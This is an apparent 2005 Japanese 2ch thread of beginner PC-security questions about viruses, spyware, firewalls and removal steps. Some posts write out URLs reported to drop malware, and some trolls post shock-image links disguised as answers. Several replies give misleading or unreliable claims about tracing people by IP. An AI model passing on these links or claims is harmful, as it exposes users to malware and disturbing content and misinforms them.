>>161さん、めっちゃ親切にありがとうございます！これを機にセキリティのこともうちょっと勉強します。
自分が踏んだのはtp://www.google.co.jp/search?hl=ja&btnI=I%27m+Feeling+Lucky&lr=lang_ja&q=sahra1354です。

症状は強制電源落ちぐらいであとはわかりません。とりあえずｳｨﾙｽﾊﾞｽﾀｰｵﾝﾗｲﾝｽｷｬﾝしました。
結果､1件検出しました。で、C:\WINDOWS\Temporary Internet Files\Content.IE5\39JR32YS
にあった感染したファイルを消しちゃいました。きっと無謀ですよね・・。今度からは駆除ソフトにやっつけてもらいます。

全板トナメ3/23　予選20組頑張って下さい。

>>152
BLACKLIGHTの速度はどんな感じ？
ネットワークやカーネルのチェックとかしてそう？
全ファイルとレジストリーで怪しそうなものをリスト表示するだけじゃないよね？

>>152
ついでに言っとくけど早くFW入れとけば
あとProcessWalkerでプロセスをツリー表示で見るとか
SysinternalsのFilemonは試した？

Windows 98／98SE／Me用MS05-002の修正プログラム
この修正プログラムを適用するとパソコンが不安定になる
ブルースクリーン等も
アプリケーションの追加と削除でのアンインストールで直る
起動に問題ならscanreg /restore

フラッシュとかを見ようとしても、セキュリティマーク(黄色い盾に！)
が出てみれません。どうしたらいいですか？
またそういう系は金かかるんですか？

>>168
>>1

Norton AntiVirus2005と、Ad-Awareを入れてるんですが
エロのサーチエンジンが何度も開いては閉じてを繰り返し,
ネットで半角しか打てなくなってしまったりしてしています。
この文章もメモ帳から作ってコピペしています。ｗ
もう、フォーマットしちゃいたいんですが、
ノートンって再インストできるんでしょうか？？
よろしくお願いします

質問です

パソコンの変換で登録した覚えがないのに、
え　から始まる４文字だけ変換に　ウホッツ　が混じってるんです

例）　えろいな、えんかよ、えんだよ、など

これはもしやウイルスでしょうか？

質問する人は>>1の★━ 質問のしかたを読んでから質問しましょう。

>>170
Spybotは嫌いなのかな
スパイウェアのオンラインスキャンでもまわってみれば

焦っていたものですいません
窓ＸＰで、ブラウザはＩＥ、ウイルスバスターは入れています
昨日までは普通の変換でしたが、なぜかおかしくなっています
ウィルス検索しても、なにもひっかからないので、直すにはどうしたらよいでしょうか

質問なのですが、
今ノートンを使っていて、フリーのソフト（avast!かAVG）に乗り換えようと思ってます。
その場合は、

ノートンアンインストール→新しいのインストール
新しいのインストール→ノートンアンインストール

どっちのがいいのでしょう？
ちなみにWinXPです。

>>175
どう考えても上の選択しかあり得ない（複数のアンチウィルスの同居はタブー）

フリーソフトに乗り換えるんだったら自分で調べる癖をつけておかないと前途多難だぞ

>>176
そうなのですね、ありがとうございました！

>>168
セキュリティを中に設定

マルチポストにつき放置してくだされ。
http://pc5.2ch.net/test/read.cgi/sec/1105933333/565n
http://pc5.2ch.net/test/read.cgi/sec/1108718666/640n
http://pc5.2ch.net/test/read.cgi/sec/1110068000/339n
http://pc5.2ch.net/test/read.cgi/sec/1077204396/543n

IP抜いて、そこからそいつの住所、名前がわかるものなんですか

質問の仕方がおかしかったw
　
IPから住所、名前などの個人情報がわかるんですか

>>181
ググれ
散々出てる

>181
プロバの管理者以外はわかりません。
ただ、ＩＰを元に大まかな所在はわかりますが。

IPから住所、名前などの個人情報がわかるんですか

>>184
一言一句同じ質問してる奴いるから他でやれ
ばか

>>184
IPがわかれば会社名やメールアドレス電話番号もばれる。
上級者は２ｃｈでIPを抜ける。

>>186
そうだ。ふしあなさんトラップでなＷ

さっきwhoisで俺の住所と名前とＩＰが晒されていた。
一瞬驚愕したが、後思わずほくそ笑んでしまったﾆﾔﾘ

ipがばれるとこうなるかも
http://www.ogrish.com/archives/2005/march/ogrish-dot-com-suicide_attempt2-tn.jpg

ＩＰなんて関係ねェよ。人の恐怖心を煽るヘタレどもが。

>>186
その上級者ってどういうこと？
心当たりあるんだけど・・・

２ちゃんのとあるスレで煽ったら、FWのログがすごい早さで埋まっていって
ガクブルですぐにインターネット接続切断した。
もちろん、ふしあなさんなんかしてないにょ・・・

>>191
上級者はあるソフトを使って書き込みをした人のIPがわかる。

>>192
それは、書き込んでから数ヶ月たった状態でも　IPわかるの？

>>193
過去ログが読めれば可能

過去ログあればIP引き出せるって、
おっかないツールがあるんですね
　おれもさがそっと

携帯で２ｃｈに書き込んだ人のにも、IPは存在しますか？
また、住所などがわかるのでしょうか

ここ行け
ワンクリック登録詐欺サイト質問スレ　その16
http://pc7.2ch.net/test/read.cgi/antispam/1109956976/l50

え〜初心者です。
どっかでＦＷはスパイソフトを検出しないから
別にスパイ駆除ソフトを使えと聞いたんですが
実際どうなんですか？今自分ノートン先生の加護をうけてますけど

>>198
http://www.sexstump.com/streetscene.jpg

>>198
ここ行け
【アダルトサイト被害対策の部屋】
ttp://www.higaitaisaku.com/index.html

>>199
グロ注意

あっ、ちなみにさきほどVIPのかたから
ダークロリータを頂戴いたしました。
先生はだんまりを決め込んでます
うはｗｗ

住所調べていい？　
っていう発言はまずいですか？

>>202
いや、やめてください。ここのひとたちには
串通そうがなんだろうが無理ｐなんで
あと調べてみてもダークロリータの悪さがわからない
エロサイト飛ばすだけじゃないのですか？

>>176
適当な事言ってんなよｗ

>>204
そいつは初耳だな（笑）

>>28
>>33
助言有難うございます
なんとか自分で頑張ってみようと思います＾＾；

スウェーデンかどこかの無料ウイルスソフトって何ですか？

なんかトロイの木馬らしきものが発見されたのですが、
セキュリティソフトが入ってないもので・・・
お金もないので無料のやつを探しているのですが・・・
なにとぞ宜しくお願いします

downloader.torojanに感染しました。
ﾉｰﾄﾝでは削除できませんでした。手動で消そうとしても消せません。消そうとすると
「ﾃﾞｨｽｸがいっぱいでないか、禁止になっていないか、またはﾌｧｲﾙが使用中でないか確認してください」
っていう表示がでます。
どうしたら消えますか？

OSはWindws 98, 2000, XPの3台ですけど、
初期の設定のままになってます。

自宅でInterNetしか使わない状態で、とにかく徹底的にセキュリティを
上げたい場合には、
「ここをいじっておけ！！」って部分を全部抑えてるサイトありますか？
もしくは、設定のことを全部教えてください。

正確な用語出してもらえれば、全部調べて変えます。

>>207-208 は、　>>6 >>9
安全なソフトしか実行させない Abtrusion Protector
http://pc5.2ch.net/test/read.cgi/sec/1034694025/

>>209 ノートンスレで聞いて来れば？
>>210 google、ハッカーサイト

ついでに
JRE 5.0 Update 2 Build 1.5.0_02-b09

今まではルータを解さないでネットに接続していたため
ファイアーウォールソフトのアタックのログが1日何百件とあったのですが

ルータを介するようになってから外部からのアタックの件数は０件です。

これはルータだけですべてアタックをはじいているためだと思うので宇賀
とすると個々のPCにインストールしているファイアーウォールソフトは不要でしょうか。
やはり用心してルータと個々のPCにファイアーウォールソフトの２段階にしておいたほうが
無難でしょうか。

ルータがすべてはじいてくれて１００％安心して任せられるならここのPCにファイアーウォールソフト
をインストールする手間が省けるなと思っているのですが、どうなんでしょうか。

ルータはデバイスの概念でＦＷは領域の概念だから

>>213
レスありがとうございます。しかし難しい。デバイスの概念？領域の概念？
ルータとFWで概念が違うから両方必要という解釈であってますえしょうか。
よくわからない。すみません。

オイラはNot 213
>>214
まぁ100%はじくかどうかは置いといて
ルーターにあなたが必要なパーソナルファイアーウォールの機能全てのかわりがあるかどうか

すみません、

コンパネ→管理ツール→イベントビューア
で、セキュリティのタブ
ユーザー名でソートして、ANONYMOUS　LOGONってユーザー名があったら
ハッキングされているのでしょうか？
OSはxp home editionです

されてない
ユーザーアカウントに"不明なアカウント"てのがあったら((；ﾟДﾟ)ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

わかりました、ありがとうございました！

>>217
回答ありがとうございます。
俺は216ではないのですが、自分も気になってたので。
ちなみにこのＡＮＯＮＹＭＯ　LOGONとはどういう場合にログに残るのでしょうか？
友達のＰＣには残ってなかったので気になります。

>>215
アドバイスありがとうございます。

自分が使っているルータにどんな機能があるのかを見ればいいのですね。
ルータ自身にフィルタ機能とかいろいろあるみたいですね。
１００％はじくかどうかは置いといてということなので
やっぱりファイアーウォールソフトも入れておくことにしたほうが無難ですかね。

コンパネ→管理ツール→イベントビューア で、セキュリティのタブユーザー名でソートしたんですが
ANONYMOUSの他にsystemってのがたくさんある。それからnetwork servisってのも　これはハッキング
とかされてませんか？ OSはXPです

ログを取得することにより、操作記録が残りますので、アクセス制
　御方針に基づいた計画と運用とのずれを発見できたり、インシデン
　トが発生した時に、証拠資料として事象を残すことができます。

OSはXPです。
なにやら「仮想メモリの容量が少なくなってきています」
とか出るのですが、これはどういうことでしょうか？
又、どのような解決策をとったらいいのでしょうか？？

よろしければご教授ください。

とりあえずぐぐればわかるだろ

>>222
ありがとうございます

>>220
いやルーターは一般的FWと同等の機能を持ってないという意味だと

>>226
わかりやすく言ってくださってありがとうございます。

ということはやっぱり一応ファイアーウォールソフトは入れておいたほうが無難なようですね。
ファイアーウォールソフトのアタックの表示が０なので、ルータを介してさえいれば大丈夫
なのかなと思ったのですが、やっぱり個々のPCにファイアーウォールソフト入れておくことにします。
どうもありがとう。

先ほどノートンウィルススキャンでunidist.ocxというダイヤラーが検出されまして
早速削除ボタンを押したのですが全く削除されませんでした。
結局ファイルの場所をたどってファイルを削除したのですが…

ノートンは使い物にならないのでしょうか？それとも手順ミスですか？
宜しくお願い致します

>>228
それが本当なら、スクリプトの段階で遮断していないんだね
マカフィーにしな
結局、C:\Documents and Settings\ユーザー名\Local Settings\Temp
このフォルダ内に展開されちまったのか？
それとも、インストールまでされたか？
だったら、最低だね　マカフィーにしな

セキュリティ初心者なのでよく分かりませんが
Temporary Internet Filesというファイルの中に入っていました。
一応ゾーンアラームは入れてあるのですが、大丈夫でしょうか？

>>230
なんだよ
じゃあ、スクリプトまでは実行されてしまっているんだわ
使用中のファイルになってしまっているから、ノートン先生でも削除拒否される
初心者にとって、あんまりいい仕様とは言えないな！
スキャンした時に、Temporary Internet Files
このフォルダ内だけだったら、ファイルを持ってきただけだから、
それが実行されて、
他の領域に展開されなければ、システムには感染していない

ウィルスが見つかった時点で一回スキャンをストップし
駆除作業に移ったので完全スキャンはできていません。
完全スキャンした方がよいでしょうか？

こういったダイヤラーはFWのアウトバウンドが機能していれば実害は
防げるのでしょうか？

なにせ初めてのウィルスなので、指導の方お願い致します

自宅でInterNetしか使わない状態で、とにかく徹底的にセキュリティを
上げたい場合には、
「ここをいじっておけ！！」って部分を全部抑えてるサイトありますか？
もしくは、設定のことを全部教えてください。

ハッカーサイトで調べても、用語辞典1件やっとで、肝心のサイトが見つかりません。


初期設定で回線は直結です。非常に不安です。

>>232
ダイヤラーの場合は、接続プログラムが最初に起動して
ダイヤルアップしようとする
この段階で変に思うはずだ
ADSLなんかだと回線自体が電話回線には直接繋がっていないから、
そもそも接続出来ない
トロイなんかだとサーバーとして何かのプロセスが起動して、
アウトバウンド発信するから、この段階でファイアーウォールが検知する
ただ、ネットワーク上に発信する際に、
許可してあるウィンドウズのシステムプロセスなどを利用されて
発信などされればわからない事がある
ソフトだけでは完全な防衛は不可能
人間の監視も時には必要だよ

ｈｔｔｐ://www.google.co.jp/search?hl=ja&btnI=I%27m+Feeling+Lucky&lr=lang_ja&q=sahra1354
↑を踏んでしまったんですがどうすればいいですか？一応ノートンでスキャンしたんですが・・・。
ＯＳはWindows XPです。

>>234
分かりました。今又一つウィルスが発見されました。
とりあえず完全スキャンを優先して結果を報告します。
シマンテックのオンラインポートチェック（大丈夫だそうです）をしたのと
光なのですが接続先の確認をしました。
とりあえずはこれで安心でしょうか？

すみません。236です。
接続先→接続状況です。

>>233
http://homepage2.nifty.com/security_hikaku/newpage3.htm

友人のＰＣを今チェックしてます。
まったくセキュリティーやらずにネットサーフィンしていたようで、
オンラインスキャンをしたところシマンテックのノートンで20個ぐらい
ウイルスバスターの方で９個ぐらい
主にトロイの木馬が検出されたました。
体験版をインストールしウイルスバスターの方は駆除できました。
ノートンのほうで、C:\WINDOWS\TEMP\tmpのところに
「PWSteal.Trojan」というウイルスが検出されました。
ウイルス警告で、検出し駆除しました。とあるのですが、大量の数が報告されます。
tmpの後に数字とアルファベットが１ずつずれて同じウイルスがずーとでます。
中には駆除できないものや、アクセスできないものがあるようです。
今既に５００個ぐらい報告を見たのですが、いつ終わるのか分かりません。
ウイルス検索の最終報告ではウイルスは検出されなかったとあったのですが、
報告は終わりません。
全部見ずに電源ＯＦＦしても大丈夫なのでしょうか？

win MEでExplorerです。アップデートをしてる時、ダウンロードしてインストールする前に
左上に小さく自動と書いてある黒い画面が1秒位勝手に出てすぐ消えます。
セキュリティのソフトをインストールした時も同じ事が起き、spybotをインストールしてた時は
少し長く黒い窓に英語の文章が4行ササッと出て3秒位で消えました。
どこかに情報を勝手に送ってる様な感じで気持ち悪いです。
pandaとspybotとCWshredderでは何も出ず、Ad-awareで9個発見でき削除したのですが、
まだダメなのでしょうか？あと何が入ってしまったのか、解る方おりましたらお願いします。

237です。
ウィルスはやはりUniDist.ocxでした。
こんどは保存場所が違っていてC\RECYCLER\…
というところにあります。
やはりノートンは削除できませんでした。
ファイルをたどってみます。

使っているのはwin xp explorerです。

>>240
http://store.ca.com/dr/v2/ec_main.entry25?page=freePestPatrolScan&client=ComputerAssociates&sid=35715
ここでスキャンして見つかったスパイウェアを手動削除してみては？

>>239
>>241
駆除や削除ができなくても「検疫」してくれるのでパソコンはウイルスから保護されるよ。

>>241
ウィンドウズをセーフモードで起動して全ドライブスキャン後に削除しなきゃダメだな
通常モードで起動すると既にそのファイルは実行されていて、
削除出来ないかも知れない

>>244
アドバイスありがとうございます
ノートンの削除をすると修復にも検疫にもひっかからず除外となってしまうのですが。
>>245
アドバイスありがとうございます
セーフモードですか…初心者にでもできますか？

>>246
起動時にBIOSのメーカー画面が消える頃にF8キーを押す

>>246
ファイル名を指定して実行→「msconfig」と打ち込む→BOOT.INIタブ
→/SAFEBOOTをチェック→再起動

>>247
そこから先は案内に従って行けば大丈夫ですか？
やはり検疫では意味をなさないですか？
…質問ばかりすみません。

>>249
検疫でも別にいいよ
拡張子を変更したり、圧縮するなどして
ウィンドウズが実行しないようにして保存しとくだけ
気分悪いだろうから削除を奨める

質問させていただきます。
Sygate Personal Firewallの日本語化パチ入れてからアップデートすると
日本語が消えて英語に戻るんですが・・・
どうすればいいですか？
板違いかも・・・

>>250
失礼な事をいって申し訳ないですが、
例えば他フリーのアンチウィルスソフトでも駆除はむずかしいですか？

>>251
板違いでした
スマソ

>>243
どーもです。英語で分かりませんでした。
情報を送ってる様なのでは、スパイウエアのでしょうか？
駆除できるまでオークションにログインとか危険でしょうか？

>>252
そのファルをメモリー上に読み込ませたら
そのプロセスを終了させなければ削除出来ない
だから、取りあえずセーフモードで起動するのを奨めたのよ

>>252
そのファイルをメモリー上に読み込ませたら
そのプロセスを終了させなければ削除出来ない
だから、取りあえずセーフモードで起動するのを奨めたのよ

>>255
わかりました。セーブモードでやってみます。
また分からない事があったらお願い致します。

ノートンのほうで、C:\WINDOWS\TEMP\tmpのところに
「PWSteal.Trojan」というウイルスが検出されました。
ウイルス警告で、検出し駆除しました。とあるのですが、大量の数が報告されます。
tmpの後に数字とアルファベットが１ずつずれて同じウイルスがずーとでます。
中には駆除できないものや、アクセスできないものがあるようです。
今既に５００個ぐらい報告を見たのですが、いつ終わるのか分かりません。
ウイルス検索の最終報告ではウイルスは検出されなかったとあったのですが、
報告は終わりません。
全部見ずに電源ＯＦＦしても大丈夫なのでしょうか？

で、もう電源をＯＦＦしてしまったのですが、
再起動後にも同じ現象が起きてしまいます。
どうすればいいのでしょうか？
助けてください

>>256
今再起動したところです。
立ち上がるとシステム構成ユーティリティというのが表示されました。
どうすべきですか？

>>259
しゃあないなあ
セーフモードで起動して、Tempフォルダの中を全部削除しよう
http://pc5.2ch.net/test/read.cgi/pcqa/1109928233/278
これを参照　2箇所のTempフォルダね
Temporary Internet Filesの中も全部削除
その後に全ドライブをスキャンしましょう

>>260
>→/SAFEBOOTをチェック→再起動

これをやったのなら、チェックを外して再起動すればいい
面倒だからF8キーでよかったのに

>>262
とりあえず一連の流れはやってみました。
この後チェックを外し再起動ですね。分かりました。

ネットBIOSセッションのアクセスをブロックしましたと
ゾーンアラームの警告が出るのですが、これはどうゆう意味ですか？

ネットじゃなくてnetBIOSセッションでした。どこのことでしょうか？

こちらでいいのかわからいのですが、小規模LANについて教えて下さい。
7台のPCで現在LANを組もうと思っています。その際プリントサーバを使用して
全てのPCからプリントできるようにしようと思っているのですが、知人に「PCは
IPを固定せずにDHCPを使う方がいいよ。最近の企業では全てそうだよ」と助言をもらいました。
これは本当なんでしょうか？外部のPCを繋ぐ事はほとんど無いので、数台程度なら
固定してしまった方がトラブル時等、楽だと思っていたのですがこれは間違いでしょうか？
他の企業の最近のネットワークに詳しくないので、もしシステム管理等をされてる方が
いらっしゃいましたら、ぜひアドバイスをお願いします。

ちなみに構成としてはプリントサーバ2台+XPのクライアントPC7台という感じです。
よろしくお願いします。

>>262
ウィルス駆除完了しました！！！！
ほんとに力添えありがとうございます。
解決まで導いて頂いて本当に感謝感謝です。
これをいい勉強にしてもうちょっとウィルスについて調べてみます。

ありがとうございました！！！！

>>266
板違い

>>266
これはセキュリティ問題ではないから「PC等」にある「パソコン一般」板で質問された方がよろしいかと。

>>267
おめでとうさん
ノートン先生はスクリプトファイルをスルーしちまったようだね
だから、みんなしてIEのセキュリティを高設定にしているのか
悪い事は言わないから、乗り換える気があるのならマカフィーにしな

マカフィーでもノートンでも、定期的に入れ直す必要があります
それがマイクロソフトクオリティ

>>270
本当にありがとうございました。
最後に一つだけ。今回この様なプログラムが進入したのは
インターネットオプションの設定の甘さが原因ですか？

>>268-269
すいません。誘導ありがとうございます。
そちらで質問してみる事にします。

スパイウェアの
ttp://www.kit.hi-ho.ne.jp/wannt/momoiro/img20050203220305jpg
踏んだんですが、これからウイルスバスターいれて間に合いますか？
お願いします。

"Prevention is better than cure"

>>261
レス遅れてすいません。
今からトライしてみます。
本当にありがとうございました。

ZONEとKaspeというのを入れようと思ったのですけど、
Zoneはわかったのですけど、後者のHPが見つかりません。

日本語で解説してあるページ、知ってたらお願いします。

>>261
参考スレみてやってみました。
「regsvr32 /u "c:\ファイルのパス\xxxxx.dll"　または、.ocx
このコマンドでアンインストールする 」
ここが出来ません。
コマンド実行すると、
「ＤＬＬ名が指定されていません。
使用法：REGSVR43[/U][/S][/N][/ｉ[:コマンドライン]]DLL名
/u- サーバーを登録解除する
/s- サイレント；メッセージボックスを表示しない
/i-省略可能な「コマンドライン」を引数としてDllInstallを呼び出す；/uと併用した場合はdll uninstallを呼び出す
/n-　DllRegisterServerを呼び出さない；このオプションは/iと併用する必要がある
　　　　　　　　　　　　　　ok
ってのが出ます。
フルパスは間違いなくコピーしたつもりです。
いくつかためしたのですが全部そうなりました。

ひとつのフルパスは
「C:\WINDOWS...\HANGAMEPLUGINJP16.DLL]で、
これを単純に
「regsvr32 /u"c:\WINDOWS...\HANGAMEPLUGINJP16.DLL」
といれて実行したら上の書き込みのようになりました。
何卒追加アドバイスお願いします。

>>279
regsvr32 /u "c:\WINDOWS...\HANGAMEPLUGINJP16.DLL"
>/uのうしろに入力の区切りとして半角スペースが必要

>>279
そのハンゲームのプラグインはアンインストールしてもいいの？
またインストールは出来るけど？
怪しいのをアンインストールする

何かわからずクリックしたら変な外国のサイトにつながって消しても消しても
でてきてゴミ箱に捨てるときにアイコンのみ削除されてプログラムは削
除されないからプログラムの追加と削除から消せって出てくるんですけ
ど、どれを消せばいいのかわからなくて困ってます（＞＜)

>>282
＞何かわからずクリックしたら　（何を）
＞変な外国のサイトにつながって　（どこよ）
＞消しても消してもでてきて　（だから何を）
＞ゴミ箱に捨てるときにアイコンのみ削除されて　
＞プログラムは削除されないから　（当たり前だ）
＞プログラムの追加と削除から消せって出てくるんですけど、　（へえ出てきますか）
＞どれを消せばいいのかわからなくて困ってます（＞＜)　　（神様にもわからんと思うよ）

考えるな。落ち着け。まだ書き込むな。おい動くな。
>>1をゆっくり時間かけて読め。そして手元にメモ帳を準備しろ。
まず使用マシンの基本情報を>>1を参考にして書きとめろ。
それから、このスレ>>1以降をゆっくり読め。
自分に関係ありそうなことを見つけたらどんどんメモしていけ。
その後、できそうなことを一つ一つ実行して、結果をメモしろ。
質問はその後だ。その際、必ず下書きして入念に推敲しろ。
（「推敲」は「すいこう」と読む。意味は辞書ひいて調べれ。
　http://www.excite.co.jp/dictionary/japanese/　）

>>282
とりあえず、
↓
エロサイト見たら…助けて下さい！Part51
http://pc5.2ch.net/test/read.cgi/pcqa/1109928233/

MS05-002のHotfixをインストール後スタートアップでKB891711.EXE起動する
プロセス強制終了でブルースクリーンになるかもしれない

CWshredderがセーフモード時に、デスクトップやプログラムの中にありません。
どうすればセーフモードでCWshredderが使えるのでしょうか？

>>286
板違い

ウィンドウズNT4.0SP6に対応したファイヤーウォールソフトってありますでしょうか？

ＰＣを立ち上げるとカーソルの横で砂時計が激しく点滅するようになってしまいました。
何を確認したらいいのかさえ分かりません。アドバイスお願いします。

>>288
これが使えるのではないでしょうか？
http://www.agnitum.com/download/outpost1.html

書き込みしたいのですがノートン2004はどう設定したら
いいのでしようか？教えていただけませんか？

PGP6.5〜8.1の「自己解凍形式暗号化ファイル」って
アルゴリズムは何が使われていますか。

公開鍵方式だとAESやTwofish、TripleDESなど様々選べるようですが
自己解凍形式については設定項目もないし記述も特にないのでわかりませんでした

えーと、どういうところで相談したらいいのかよくわからないですが、
最近PCを起動させていると

ttp://www.freewebs.com/green-ninjas/mt.html

という真っ白なWEBページが次から次へと開かれていく現象が起きます。
何かのウイルスでしょうか？
何か対策を知っている方がいらしたら教えてください。
よろしくお願いします。

>>290
レスありがとうございます。m( _ _ )m
フリーで出ているものなんですね。

無料のZoneアラームは期限が来ると使えないですよね。
これって延ばしたり、また無料で使うことできないんですか？

とりあえず日本語版いれてみろ

すでに入れてますけど、もうすぐ期限ですよ。すぎるとやっぱり
再インストールしても使えませんよね？

>>293
ADW_STUFF.Aかな？見付けたのをそのまま貼るよ

Open the Downloaded Program Files folder (which you can find inside the Windows folder).
Right-click and remove the entry named ‘MediaTicketsInstaller Control’ (MT variant) or ’ShellInstaller Control’ (BuddyLinks variant).

For the BuddyLinks variant you should also remove the ’viral marketing’ component to stop it sending Instant Messages in your name.
Open the registry (click ‘Start’, choose ‘Run’, enter ‘regedit’) and select the key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run.
On the right-hand-side, right-click and delete the entries named ‘PSD Tools Channel’ and ‘BLMessagingIntegration’

質問があります。
勝手にCD-Rの挿入口が開いたり
マウスのカーソルがいきなり水平移動したりするんですが
これって何か乗っ取られてるのでしょうか。

火壁もいれてるしウイルスチェック等もしたのですが
異常はなくガクブルしています。

勝手にCD-Rの挿入口が開いたことは無いけど
マウスのカーソルがいきなり動くのはよく起こりますが。。。

>>297
きちんと説明嫁

>>299
トレイが開くウイルスは人気がある。
学生とかがウイルス本を使って
一番最初に作るのがその手のタイプ。

>>294
私もWindows2000、XPで使っています。
インストールはこちらを参考にされるといいと思います。
http://eazyfox.homelinux.org/Firewall/Outpost/Outpost1.htm

））293
スパイウェアが入っていると思われます。
取り敢えず、こちらのフリーソフトでチェックしてみてください。
http://www.lavasoftusa.com/support/download/#free

>>295
Freeのゾーンアラームは使用期限とかは一切なしでいつまでも使い続けられる
ゾーンアラームProは使用期限があるけど金を払ってシリアルとかを教えてもらい
それを入力すれば継続して利用できる

>>295 は最初に起動する時に良く読まないままproの方を選んじゃったってオチでしょたぶん

私、インターネットの回線はＡＤＳＬで、モデムの電源を切ればＩＰアドレスは変わります。
セキュリティー上、ＩＰはこまめに変えたほうが良いというのをセキュリティーサイトで見たんですが、
ここでちょっと疑問に思ったことを質問させてください。
モデムの電源入れなおして新しいＩＰを取得しても、その新しく取得したＩＰがついさっきまで他の人が
使っていたＩＰで、もしその人がＰ２Ｐなんかやっていた場合、自分のＰＣに見知らぬアクセスが大量に
来るって事はないんでしょうか？

>>307
それは大丈夫

>>308
詳しく！！

>>307
あり得ます。実際に私が一週間ぶりにモデムやＰＣの電源を入れたら、
ファイヤーオールソフトが警告の嵐。
ポートをつつかれまくりでした（ｗ

ノートン2004のファイル移動するたびにスキャンする機能って
止められないの？

>>311
止めたら意味なし　アホ

>>311
アホいうな　デブ

>>311
止められるでしょ

windowsXPです。
Norton AntiVirusで、LiveUpdateの更新をしようとすると、
「ホストに接続できません
LiveUpdate がインターネットサービスプロバイダに
接続できませんでした。ダイヤルアップ情報が正しい
ことを確認してください。」
となり失敗してしまいます。
何故なのでしょうか。。？

自分のPCのHDDの間行ったり来たりするだけでも
止めたら意味ないの？

>>315
LiveUpdateのバージョン古いとか？

ウィンドウズＭｅなんですが
ウイルススキャンすると毎回ＥＩＣＡＲテストウイルスが検出されます
隔離はできるのですが、何故か削除できません
今、自分のＰＣ内には８個のＥＩＣＡＲテストウイルスが居座っています
どうすれば削除できますか？
おしえて

>>318 Winnyはやってないのか？？？

セーフモードでavastをインストールって、できますか？

windows XPです。
AntiVirs をインストールしていますが、有効になりません。どうしたらよいでしょうか。

>>317
liveupdateが古い場合ってまた新しくnortonを買わなければ
ダメなのでしょうか？

シ　マ　ン　テ　ッ　ク　に　訊　け　ば　

い　い　と　思　う　よ　

>>319
そう言ったモノは何一つやってないです

>>324
システムの復元を切れば

ここでいいかな？
spybotを使ってスパイウェアを消しているんですけど、
2つほどどうしても消せません。
メモリ上にあるから無理、と出てきます。
何か言い解決方法はありませんか?

>>326
セーフモードでspybot実行汁

プロセスのイトフユ

>>327
分かりました。

基本的な質問です。
ルータのセキュリティをオフにするには、どうすればよいのですか？
COREGAのルータです。
セットアップ画面のセキュリティの
「DoS(Denial of Service)ファイアウォールを使用する」のチェックを
外せばよいのでしょうか？
宜しくお願いします。

>>327
アドバイスありがとうございました。
ただ、憎たらしいスパイウェアはしぶとく生き残りました。
個人的に削除するのが面倒＆とりあえず実害はなさそう、
なのでほっとこうかなと思いますけど、やっぱり問題ありますか?

>>331
DSO ExploitとCnsMin（NECのパソコンの場合）なら、ほっといてもいいと思う、、、
つーか、spybotスレに行ってみれば？

>>332
後者の方に当てはまりますね。
とりあえず、後ほどそのスレに逝ってみます。

すいません、Unix.Penguinに感染したとのメッセージが出ました。

初心者でどうしたらいいのか分からないので助けてください！

ネット中に突然、ＰＣの電源が切れて再起動し始めました
これはいったい何なんでしょうか？
前にも一度あったんですが・・・
その時に観覧してたＨＰは２ｃｈ動画板のトップページです

ＯＳはＭｅ
セキュリティーソフトは入ってます

>>331
やはり残ったか
漏れのアドバイスもう一度信じてくれるのであれば
Ad-awareSEをインスコしてもう一度セーフモードでspybotを
実行した後Ad-awareSEで実行汁
http://www.download.com/3000-2144-10045910.html?part=69274&subj=dlpage&tag=button

>>335
ブラスター

セキュリティソフトの性能によっては防げない。

接続先が勝手に変えられてしまいます
ISTsvcっていうプログラムが怪しそうです
勝手にポップアップ広告も出るので、正常に戻したいんですが
スパイウェアにかかっているんでしょうか？

>>337
まじですか・・・
FWはアウポです

>>339
アウポはルール作りを失敗したり変なプラグインを入れたりするとザルになる。
設定の自由度が高い分だけ高スキルを要求するソフト。

>>340
プラグインは何も入れてません
ルールは

ドーナツQ（最新バージョン）
　特定のプロトコル　TCP
　アンド特定の方向　送信
　特定のリモートポート　HTTP,HTTPS
　これを許可する

OpenJaneDoe（最新バージョン）
　特定のプロトコル　TCP
　アンド特定の方向　送信
　特定のリモートポート　HTTP
　これを許可する

です

ていうか9x系統にはよくあることだがメモリのリードやライトに失敗すると
青っ面になるまえに勝手に再起動することがある。
NT系統でもなることがあるので別に9xだけじゃない

毎回決まったタイミングで再起動するとか、
タイミングは不定だが頻繁になるというのでないなら
(用心するに越したことはないが)それほど深刻ではない

そういやブラスターはWindowsNT、Windows2000、XPにしか感染できないしな。

>>341
・・・それじゃ全然ダメでしょ。
早くメーカー製のＦＷ買いなさいよ。
教えるのメンドクセ

>>343
改良版が出てる。あと、古いブラスターの侵入を受けると、
9ｘ系は感染はしないが、落ちる。

無線LANでパソコンをやっていて、ネットスタンブラーを使ってるんだけど
そこに１台しかコンピュータが無いのに。
自分の以外に別のMACアドレスも表示されるんだけど？
電話の子機とかにもMACアドレスってあるの？

98はRPC持ってないべよ

>>346
電話の子機にはＭＡＣアドレスはありません。近場に
誰か無線ＬＡＮやってる人が射るんですね。
２０メートルぐらいは余裕で飛ぶので、
私のアパートでも、ＭＡＣアドレスが見えてます（ｗ

>>338
そりゃスパイだな。スキャンして削除しなされ。
俺も何回かあるがガンバレ。

とにかく何よりもまず先に作らなければならないのは、
拒否、ピッチャーDENY、遮断、言い方はいろいろあるけど
とにかく通信しないように、
TCP, UDP, ICMP全部, IGMP
ローカルポート1〜65535
リモートポート1〜65535

これだけはまず作っておいて、あとで「例外」を追加していくとか
ルールを上位に設定するとか。

>>339>>341
ブラスターごときでアタフタしてるのに、
outpostって、バランスがあべこべだよ君。

　ケッ！今時ブラスターかよ！　→　outpost
　ブラスターか、欝棚だよな。　→　ZoneAlarm
　落ちちゃった？なんでですか？　→　メーカー製ＦＷ

こんな感じだろ。

>>348
ハッカーみたいな人に不正アクセスされてるの？

>>348
問題無いの？

PCIタイプ
カードタイプ
子機MAC

電波飛ばす親機


どっちにもMACがないとそもそも通信できねえ


ルータでも同じ
ルータとボードで個別に持ってる

>>352
ＷＥＰ設定してますからアクセスできませんよ。
まあ、キモいといえばキモいですが。

>>354
おーい質問者はそこまで低レベルじゃないよ。
そういうの知った上で不明なＭＡＣアドレスがあるから
電話の子機ぐらいしか思いつかないっていってるだけでしょ。

拡大解釈か妄想

>>355
サンクス。

>>357
トンソク。

>>358
クソントン

>>335
メモリーが粗悪か電源がヘタレ…というオチだったりして

>>303
ありがとうございます！
そこのサイトがとても役に立ちそうです。
アウトポストだけではなく、kerioというソフトもNTに対応だったりしますね。
助かります。m( _ _ )m

>>361
